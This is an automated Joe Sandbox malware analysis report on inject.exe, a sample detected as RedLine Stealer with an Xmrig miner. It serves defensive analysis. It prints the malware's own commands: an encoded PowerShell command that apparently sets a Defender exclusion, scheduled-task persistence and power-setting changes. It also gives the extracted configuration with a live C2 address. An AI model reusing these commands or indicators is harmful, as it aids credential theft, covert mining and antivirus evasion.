Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
inject.exe

Overview

General Information

Sample name:inject.exe
Analysis ID:1522107
MD5:a1e894c08c924eec77ce07e2a8405b86
SHA1:ff3f45d1773a07c2e92639ee7f0df24df4fbaf6f
SHA256:527dbb0c86940e85a442e5eb558c9e2f8a20f257b1eb799ce32d6890c0fc48ad
Tags:exeuser-4k95m
Infos:

Detection

RedLine, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Drops password protected ZIP file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Execution of Powershell with Base64
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • inject.exe (PID: 2452 cmdline: "C:\Users\user\Desktop\inject.exe" MD5: A1E894C08C924EEC77CE07E2A8405B86)
    • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 3724 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 616 cmdline: "C:\Users\user\AppData\Local\Temp\conhost.exe" MD5: CE901A874C9D157E48F83B1BE3D32AA6)
        • cmd.exe (PID: 6648 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • mode.com (PID: 2472 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
          • 7z.exe (PID: 5560 cmdline: 7z.exe e file.zip -p29586644319935208542739921766 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 6408 cmdline: 7z.exe e extracted/file_11.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 7156 cmdline: 7z.exe e extracted/file_10.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 7064 cmdline: 7z.exe e extracted/file_9.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 2820 cmdline: 7z.exe e extracted/file_8.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 1784 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 3116 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 4832 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 6720 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 4676 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 1396 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 3440 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • attrib.exe (PID: 5300 cmdline: attrib +H "Installer.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
          • Installer.exe (PID: 2164 cmdline: "Installer.exe" MD5: 89A069871324D35E25922F6FB881D514)
            • RegSvcs.exe (PID: 5552 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
              • cmd.exe (PID: 1492 cmdline: "cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 2352 cmdline: powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • WmiPrvSE.exe (PID: 828 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
              • cmd.exe (PID: 6520 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • schtasks.exe (PID: 5616 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
              • cmd.exe (PID: 6004 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7625" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": "185.215.113.22:80", "Bot Id": "@exelzt", "Message": "Click Close to exit the program. Error code: 1142", "Authorization Header": "2512ea8d547d5afb96b66992e487c694"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2215892910.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2055709662.00000000037F5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000016.00000002.2282337473.000000000045A000.00000004.00000001.01000000.0000000D.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
          • 0x28d1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
          Process Memory Space: inject.exe PID: 2452JoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Click to see the 6 entries
            SourceRuleDescriptionAuthorStrings
            0.2.inject.exe.37f5570.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              0.2.inject.exe.37f5570.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                3.2.RegAsm.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

                  System Summary

                  barindex
                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3724, TargetFilename: C:\Users\user\AppData\Local\Temp\conhost.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 5552, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ProcessId: 1492, ProcessName: cmd.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\Temp\conhost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\conhost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\conhost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\conhost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\conhost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3724, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\conhost.exe" , ProcessId: 616, ProcessName: conhost.exe
                  Source: Process startedAuthor: frack113: Data: Command: powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" , CommandLine: powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1492, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" , ProcessId: 2352, ProcessName: powershell.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" , CommandLine: powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1492, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" , ProcessId: 2352, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 5552, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", ProcessId: 6520, ProcessName: cmd.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-29T09:44:02.541531+020020432341A Network Trojan was detected185.215.113.2280192.168.2.549704TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-29T09:44:02.309242+020020432311A Network Trojan was detected192.168.2.549704185.215.113.2280TCP
                  2024-09-29T09:44:07.926652+020020432311A Network Trojan was detected192.168.2.549704185.215.113.2280TCP
                  2024-09-29T09:44:12.194080+020020432311A Network Trojan was detected192.168.2.549704185.215.113.2280TCP
                  2024-09-29T09:44:15.827930+020020432311A Network Trojan was detected192.168.2.549704185.215.113.2280TCP
                  2024-09-29T09:44:16.498001+020020432311A Network Trojan was detected192.168.2.549704185.215.113.2280TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-29T09:44:02.309242+020020460451A Network Trojan was detected192.168.2.549704185.215.113.2280TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeAvira: detection malicious, Label: TR/Dldr.Agent.vfpsy
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeAvira: detection malicious, Label: TR/Redcap.bgduw
                  Source: 00000000.00000002.2055709662.00000000037F5000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "185.215.113.22:80", "Bot Id": "@exelzt", "Message": "Click Close to exit the program. Error code: 1142", "Authorization Header": "2512ea8d547d5afb96b66992e487c694"}
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeReversingLabs: Detection: 83%
                  Source: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeReversingLabs: Detection: 91%
                  Source: inject.exeReversingLabs: Detection: 76%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeJoe Sandbox ML: detected

                  Bitcoin Miner

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Installer.exe PID: 2164, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5552, type: MEMORYSTR
                  Source: inject.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.5:49716 version: TLS 1.2
                  Source: inject.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: Installer.exe, 00000016.00000002.2282337473.000000000031C000.00000004.00000001.01000000.0000000D.sdmp, Installer.exe, 00000016.00000003.2281553518.0000000003542000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.2334616398.0000000000402000.00000020.00000400.00020000.00000000.sdmp
                  Source: Binary string: c:\rje\tg\v\obj\Release\Qrr.pdb source: inject.exe
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,5_2_004031DC
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,5_2_0040367D
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_00317978 FindFirstFileW,FindFirstFileW,free,9_2_00317978
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_0030A151 FindFirstFileExW,22_2_0030A151
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0031881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,9_2_0031881C
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06CF9973h3_2_06CF9740
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06CFE533h3_2_06CFE270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc dword ptr [ebp-20h]3_2_06CF3E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06CFCCABh3_2_06CFCC93
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06CFF83Dh3_2_06CFF81C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc dword ptr [ebp-20h]3_2_06CF4122
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 08E7AE03h3_2_08E7AB30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 08E7D208h3_2_08E7CD10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 08E7A8F7h3_2_08E7A198
